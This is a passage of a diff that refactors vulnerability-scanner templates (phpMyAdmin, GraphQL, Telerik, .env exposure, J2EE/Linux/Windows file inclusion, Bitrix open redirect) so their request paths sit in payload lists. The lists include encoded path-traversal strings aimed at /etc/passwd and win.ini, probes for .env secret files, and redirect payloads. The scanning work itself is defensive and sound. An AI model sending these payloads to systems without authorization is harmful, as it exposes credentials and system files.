- "{{BaseURL}}/phpmyadmin/setup/" - "/phpmyadmin/setup/index.php"
- "{{BaseURL}}/setup/index.php" - "/pma/setup/index.php"
- "{{BaseURL}}/admin/" - "/admin/pma/setup/index.php"
- "{{BaseURL}/phpMyAdminOLD/setup/index.php" - "/phpmyadmin/setup/"
- "/setup/index.php"
- "/admin/"
- "/phpMyAdminOLD/setup/index.php"
stop-at-first-match: true stop-at-first-match: true

251
http/technologies/graphql-detect.yaml
View File

@ -10,131 +10,134 @@ info:
http: http:
- method: POST - method: POST
payloads:
paths:
- "/HyperGraphQL"
- "/___graphql"
- "/altair"
- "/api/cask/graphql-playground"
- "/api/graphql"
- "/api/graphql/v1"
- "/explorer"
- "/express-graphql"
- "/gql"
- "/graph"
- "/graph_cms"
- "/graphiql"
- "/graphiql.css"
- "/graphiql.js"
- "/graphiql.min.css"
- "/graphiql.min.js"
- "/graphiql.php"
- "/graphiql/finland"
- "/graphql"
- "/graphql-console"
- "/graphql-devtools"
- "/graphql-explorer"
- "/graphql-playground"
- "/graphql-playground-html"
- "/graphql.php"
- "/graphql/console"
- "/graphql/graphql-playground"
- "/graphql/schema.json"
- "/graphql/schema.xml"
- "/graphql/schema.yaml"
- "/graphql/v1"
- "/je/graphql"
- "/laravel-graphql-playground"
- "/playground"
- "/portal-graphql"
- "/query"
- "/query-api"
- "/query-explorer"
- "/query-laravel"
- "/sphinx-graphiql"
- "/subscriptions"
- "/v1"
- "/v1/altair"
- "/v1/api/graphql"
- "/v1/explorer"
- "/v1/graph"
- "/v1/graphiql"
- "/v1/graphiql.css"
- "/v1/graphiql.js"
- "/v1/graphiql.min.css"
- "/v1/graphiql.min.js"
- "/v1/graphiql.php"
- "/v1/graphiql/finland"
- "/v1/graphql"
- "/v1/graphql-explorer"
- "/v1/graphql.php"
- "/v1/graphql/console"
- "/v1/graphql/schema.json"
- "/v1/graphql/schema.xml"
- "/v1/graphql/schema.yaml"
- "/v1/playground"
- "/v1/subscriptions"
- "/v2"
- "/v2/altair"
- "/v2/api/graphql"
- "/v2/explorer"
- "/v2/graph"
- "/v2/graphiql"
- "/v2/graphiql.css"
- "/v2/graphiql.js"
- "/v2/graphiql.min.css"
- "/v2/graphiql.min.js"
- "/v2/graphiql.php"
- "/v2/graphiql/finland"
- "/v2/graphql"
- "/v2/graphql-explorer"
- "/v2/graphql.php"
- "/v2/graphql/console"
- "/v2/graphql/schema.json"
- "/v2/graphql/schema.xml"
- "/v2/graphql/schema.yaml"
- "/v2/playground"
- "/v2/subscriptions"
- "/v3"
- "/v3/altair"
- "/v3/api/graphql"
- "/v3/explorer"
- "/v3/graph"
- "/v3/graphiql"
- "/v3/graphiql.css"
- "/v3/graphiql.js"
- "/v3/graphiql.min.css"
- "/v3/graphiql.min.js"
- "/v3/graphiql.php"
- "/v3/graphiql/finland"
- "/v3/graphql"
- "/v3/graphql-explorer"
- "/v3/graphql.php"
- "/v3/graphql/console"
- "/v3/graphql/schema.json"
- "/v3/graphql/schema.xml"
- "/v3/graphql/schema.yaml"
- "/v3/playground"
- "/v3/subscriptions"
- "/v4/altair"
- "/v4/api/graphql"
- "/v4/explorer"
- "/v4/graph"
- "/v4/graphiql"
- "/v4/graphiql.css"
- "/v4/graphiql.js"
- "/v4/graphiql.min.css"
- "/v4/graphiql.min.js"
- "/v4/graphiql.php"
- "/v4/graphiql/finland"
- "/v4/graphql"
- "/v4/graphql-explorer"
- "/v4/graphql.php"
- "/v4/graphql/console"
- "/v4/graphql/schema.json"
- "/v4/graphql/schema.xml"
- "/v4/graphql/schema.yaml"
- "/v4/playground"
- "/v4/subscriptions"
path: path:
- "{{BaseURL}}/HyperGraphQL" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/___graphql"
- "{{BaseURL}}/altair"
- "{{BaseURL}}/api/cask/graphql-playground"
- "{{BaseURL}}/api/graphql"
- "{{BaseURL}}/api/graphql/v1"
- "{{BaseURL}}/explorer"
- "{{BaseURL}}/express-graphql"
- "{{BaseURL}}/gql"
- "{{BaseURL}}/graph"
- "{{BaseURL}}/graph_cms"
- "{{BaseURL}}/graphiql"
- "{{BaseURL}}/graphiql.css"
- "{{BaseURL}}/graphiql.js"
- "{{BaseURL}}/graphiql.min.css"
- "{{BaseURL}}/graphiql.min.js"
- "{{BaseURL}}/graphiql.php"
- "{{BaseURL}}/graphiql/finland"
- "{{BaseURL}}/graphql"
- "{{BaseURL}}/graphql-console"
- "{{BaseURL}}/graphql-devtools"
- "{{BaseURL}}/graphql-explorer"
- "{{BaseURL}}/graphql-playground"
- "{{BaseURL}}/graphql-playground-html"
- "{{BaseURL}}/graphql.php"
- "{{BaseURL}}/graphql/console"
- "{{BaseURL}}/graphql/graphql-playground"
- "{{BaseURL}}/graphql/schema.json"
- "{{BaseURL}}/graphql/schema.xml"
- "{{BaseURL}}/graphql/schema.yaml"
- "{{BaseURL}}/graphql/v1"
- "{{BaseURL}}/je/graphql"
- "{{BaseURL}}/laravel-graphql-playground"
- "{{BaseURL}}/playground"
- "{{BaseURL}}/portal-graphql"
- "{{BaseURL}}/query"
- "{{BaseURL}}/query-api"
- "{{BaseURL}}/query-explorer"
- "{{BaseURL}}/query-laravel"
- "{{BaseURL}}/sphinx-graphiql"
- "{{BaseURL}}/subscriptions"
- "{{BaseURL}}/v1"
- "{{BaseURL}}/v1/altair"
- "{{BaseURL}}/v1/api/graphql"
- "{{BaseURL}}/v1/explorer"
- "{{BaseURL}}/v1/graph"
- "{{BaseURL}}/v1/graphiql"
- "{{BaseURL}}/v1/graphiql.css"
- "{{BaseURL}}/v1/graphiql.js"
- "{{BaseURL}}/v1/graphiql.min.css"
- "{{BaseURL}}/v1/graphiql.min.js"
- "{{BaseURL}}/v1/graphiql.php"
- "{{BaseURL}}/v1/graphiql/finland"
- "{{BaseURL}}/v1/graphql"
- "{{BaseURL}}/v1/graphql-explorer"
- "{{BaseURL}}/v1/graphql.php"
- "{{BaseURL}}/v1/graphql/console"
- "{{BaseURL}}/v1/graphql/schema.json"
- "{{BaseURL}}/v1/graphql/schema.xml"
- "{{BaseURL}}/v1/graphql/schema.yaml"
- "{{BaseURL}}/v1/playground"
- "{{BaseURL}}/v1/subscriptions"
- "{{BaseURL}}/v2"
- "{{BaseURL}}/v2/altair"
- "{{BaseURL}}/v2/api/graphql"
- "{{BaseURL}}/v2/explorer"
- "{{BaseURL}}/v2/graph"
- "{{BaseURL}}/v2/graphiql"
- "{{BaseURL}}/v2/graphiql.css"
- "{{BaseURL}}/v2/graphiql.js"
- "{{BaseURL}}/v2/graphiql.min.css"
- "{{BaseURL}}/v2/graphiql.min.js"
- "{{BaseURL}}/v2/graphiql.php"
- "{{BaseURL}}/v2/graphiql/finland"
- "{{BaseURL}}/v2/graphql"
- "{{BaseURL}}/v2/graphql-explorer"
- "{{BaseURL}}/v2/graphql.php"
- "{{BaseURL}}/v2/graphql/console"
- "{{BaseURL}}/v2/graphql/schema.json"
- "{{BaseURL}}/v2/graphql/schema.xml"
- "{{BaseURL}}/v2/graphql/schema.yaml"
- "{{BaseURL}}/v2/playground"
- "{{BaseURL}}/v2/subscriptions"
- "{{BaseURL}}/v3"
- "{{BaseURL}}/v3/altair"
- "{{BaseURL}}/v3/api/graphql"
- "{{BaseURL}}/v3/explorer"
- "{{BaseURL}}/v3/graph"
- "{{BaseURL}}/v3/graphiql"
- "{{BaseURL}}/v3/graphiql.css"
- "{{BaseURL}}/v3/graphiql.js"
- "{{BaseURL}}/v3/graphiql.min.css"
- "{{BaseURL}}/v3/graphiql.min.js"
- "{{BaseURL}}/v3/graphiql.php"
- "{{BaseURL}}/v3/graphiql/finland"
- "{{BaseURL}}/v3/graphql"
- "{{BaseURL}}/v3/graphql-explorer"
- "{{BaseURL}}/v3/graphql.php"
- "{{BaseURL}}/v3/graphql/console"
- "{{BaseURL}}/v3/graphql/schema.json"
- "{{BaseURL}}/v3/graphql/schema.xml"
- "{{BaseURL}}/v3/graphql/schema.yaml"
- "{{BaseURL}}/v3/playground"
- "{{BaseURL}}/v3/subscriptions"
- "{{BaseURL}}/v4/altair"
- "{{BaseURL}}/v4/api/graphql"
- "{{BaseURL}}/v4/explorer"
- "{{BaseURL}}/v4/graph"
- "{{BaseURL}}/v4/graphiql"
- "{{BaseURL}}/v4/graphiql.css"
- "{{BaseURL}}/v4/graphiql.js"
- "{{BaseURL}}/v4/graphiql.min.css"
- "{{BaseURL}}/v4/graphiql.min.js"
- "{{BaseURL}}/v4/graphiql.php"
- "{{BaseURL}}/v4/graphiql/finland"
- "{{BaseURL}}/v4/graphql"
- "{{BaseURL}}/v4/graphql-explorer"
- "{{BaseURL}}/v4/graphql.php"
- "{{BaseURL}}/v4/graphql/console"
- "{{BaseURL}}/v4/graphql/schema.json"
- "{{BaseURL}}/v4/graphql/schema.xml"
- "{{BaseURL}}/v4/graphql/schema.yaml"
- "{{BaseURL}}/v4/playground"
- "{{BaseURL}}/v4/subscriptions"
headers: headers:
Content-Type: application/json Content-Type: application/json

37
http/technologies/telerik/telerik-dialoghandler-detect.yaml
View File

@ -15,23 +15,26 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx?dp=1' - "{{BaseURL}}{{paths}}"
- '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1' payloads:
- '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1' paths:
- '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1' - '/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1'
- '{{BaseURL}}/Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1'
- '{{BaseURL}}/Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1'
- '{{BaseURL}}/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1' - '/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/Telerik.Web.UI.DialogHandler.axd?dp=1' - '/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'
- '/Telerik.Web.UI.DialogHandler.axd?dp=1'
stop-at-first-match: true stop-at-first-match: true

47
http/vulnerabilities/generic/generic-env.yaml
View File

@ -17,28 +17,31 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/.env" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/.env.bak" payloads:
- "{{BaseURL}}/.env.dev" paths:
- "{{BaseURL}}/.env.dev.local" - "/.env"
- "{{BaseURL}}/.env.development.local" - "/.env.bak"
- "{{BaseURL}}/.env.prod" - "/.env.dev"
- "{{BaseURL}}/.env.prod.local" - "/.env.dev.local"
- "{{BaseURL}}/.env.production" - "/.env.development.local"
- "{{BaseURL}}/.env.production.local" - "/.env.prod"
- "{{BaseURL}}/.env.local" - "/.env.prod.local"
- "{{BaseURL}}/.env.example" - "/.env.production"
- "{{BaseURL}}/.env.stage" - "/.env.production.local"
- "{{BaseURL}}/.env.live" - "/.env.local"
- "{{BaseURL}}/.env.backup" - "/.env.example"
- "{{BaseURL}}/.env.save" - "/.env.stage"
- "{{BaseURL}}/.env.old" - "/.env.live"
- "{{BaseURL}}/.env.www" - "/.env.backup"
- "{{BaseURL}}/.env_1" - "/.env.save"
- "{{BaseURL}}/.env_sample" - "/.env.old"
- "{{BaseURL}}/.env.{{DN}}" - "/.env.www"
- "{{BaseURL}}/.env.{{SD}}" - "/.env_1"
- "{{BaseURL}}/api/.env" - "/.env_sample"
- "/.env.{{DN}}"
- "/.env.{{SD}}"
- "/api/.env"
matchers-condition: and matchers-condition: and
matchers: matchers:

29
http/vulnerabilities/generic/generic-j2ee-lfi.yaml
View File

@ -17,19 +17,22 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/../../../../WEB-INF/web.xml" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/../../../WEB-INF/web.xml" payloads:
- "{{BaseURL}}/../../WEB-INF/web.xml" paths:
- "{{BaseURL}}/%c0%ae/%c0%ae/WEB-INF/web.xml" - "/../../../../WEB-INF/web.xml"
- "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml" - "/../../../WEB-INF/web.xml"
- "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml" - "/../../WEB-INF/web.xml"
- "{{BaseURL}}/../../../WEB-INF/web.xml;x=" - "/%c0%ae/%c0%ae/WEB-INF/web.xml"
- "{{BaseURL}}/../../WEB-INF/web.xml;x=" - "/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
- "{{BaseURL}}/../WEB-INF/web.xml;x=" - "/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
- "{{BaseURL}}/WEB-INF/web.xml" - "/../../../WEB-INF/web.xml;x="
- "{{BaseURL}}/.//WEB-INF/web.xml" - "/../../WEB-INF/web.xml;x="
- "{{BaseURL}}/../WEB-INF/web.xml" - "/../WEB-INF/web.xml;x="
- "{{BaseURL}}/%c0%ae/WEB-INF/web.xml" - "/WEB-INF/web.xml"
- "/.//WEB-INF/web.xml"
- "/../WEB-INF/web.xml"
- "/%c0%ae/WEB-INF/web.xml"
stop-at-first-match: true stop-at-first-match: true

67
http/vulnerabilities/generic/generic-linux-lfi.yaml
View File

@ -17,38 +17,41 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/etc/passwd" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/..%5cetc/passwd" payloads:
- "{{BaseURL}}/..%5c..%5cetc/passwd" paths:
- "{{BaseURL}}/..%5c..%5c..%5cetc/passwd" - "/etc/passwd"
- "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd" - "/..%5cetc/passwd"
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd" - "/..%5c..%5cetc/passwd"
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "/..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "/..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5cetc/passwd" - "/..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5cetc/passwd" - "/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd" - "/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd" - "/static/..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd" - "/static/..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "/static/..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "/static/..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/./../../../../../../../../../../etc/passwd" - "/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd" - "/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd" - "/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd" - "/./../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd" - "/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
- "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" - "/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - "/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
- "{{BaseURL}}/..///////..////..//////etc/passwd" - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
- "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd" - "/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00" - "/..///////..////..//////etc/passwd"
- "{{BaseURL}}/index.php?page=etc/passwd" - "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
- "{{BaseURL}}/index.php?page=etc/passwd%00" - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
- "{{BaseURL}}/index.php?page=../../etc/passwd" - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00"
- "{{BaseURL}}/index.php?page=....//....//etc/passwd" - "/index.php?page=etc/passwd"
- "{{BaseURL}}/../../../../../../../../../etc/passwd" - "/index.php?page=etc/passwd%00"
- "/index.php?page=../../etc/passwd"
- "/index.php?page=....//....//etc/passwd"
- "/../../../../../../../../../etc/passwd"
stop-at-first-match: true stop-at-first-match: true
matchers: matchers:

47
http/vulnerabilities/generic/generic-windows-lfi.yaml
View File

@ -17,28 +17,31 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/./../../../../../../../../../../windows/win.ini" payloads:
- "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini" paths:
- "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini" - "/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini"
- "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini" - "/./../../../../../../../../../../windows/win.ini"
- "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini" - "/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini" - "/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini"
- "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini" - "/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini"
- "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini" - "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini"
- "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini" - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
- "{{BaseURL}}/..///////..////..//////windows/win.ini" - "/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
- "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini" - "/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini" - "/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00" - "/..///////..////..//////windows/win.ini"
- "{{BaseURL}}/index.php?page=windows/win.ini" - "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini"
- "{{BaseURL}}/index.php?page=windows/win.ini%00" - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
- "{{BaseURL}}/index.php?page=../../windows/win.ini" - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00"
- "{{BaseURL}}/index.php?page=....//....//windows/win.ini" - "/index.php?page=windows/win.ini"
- "{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini" - "/index.php?page=windows/win.ini%00"
- "{{BaseURL}}/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini" - "/index.php?page=../../windows/win.ini"
- "{{BaseURL}}/../../../../../../../../../windows/win.ini" - "/index.php?page=....//....//windows/win.ini"
- "{{BaseURL}}/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini" - "/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini"
- "/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini"
- "/../../../../../../../../../windows/win.ini"
- "/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"
stop-at-first-match: true stop-at-first-match: true
matchers: matchers:

31
http/vulnerabilities/other/bitrix-open-redirect.yaml
View File

@ -19,20 +19,23 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/bitrix/rk.php?goto=https://interact.sh' - "{{BaseURL}}{{paths}}"
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh' payloads:
- '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://interact.sh' paths:
- '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh' - '/bitrix/rk.php?goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh' - '/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh' - '/bitrix/redirect.php?event3=352513&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh' - '/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh' - '/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh' - '/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh' - '/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh' - '/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh'
